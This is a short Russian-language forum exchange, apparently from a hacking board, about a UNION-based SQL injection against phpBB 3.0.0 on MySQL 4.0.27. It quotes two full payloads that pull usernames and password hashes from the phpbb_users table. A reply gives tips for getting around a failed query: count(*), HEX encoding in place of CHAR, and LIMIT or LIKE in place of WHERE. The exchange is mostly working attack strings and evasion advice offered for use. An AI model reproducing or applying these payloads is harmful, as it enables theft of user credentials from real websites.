|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417113
Репутация:
0
|
|
Сообщение от guezd
phpbb 3.0.0 MySQL 4.0.27 blind inj
Код:
ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(109, 97, 114, 97, 116)/*-
Результат показывает.
Код:
?ID=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat_ws(0x3A,username,user_password),17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 from phpbb_users where username=CHAR(115, 99, 111, 114, 114, 121)/*-
Молчит. 2ой юзер в форуме есть. Из-за чего такое может быть и как это обойти? 1. В один из- параметров подставь cout(*) и посмотри сколько возможно вывести записей при данном запросе.
2. Конвентируй в HEX, а не в CHAR.
3. Попробуй вывести без WHERE через LIMIT ИЛИ LIKE.
P.S. Не получиться, ссылку в ПМ.
|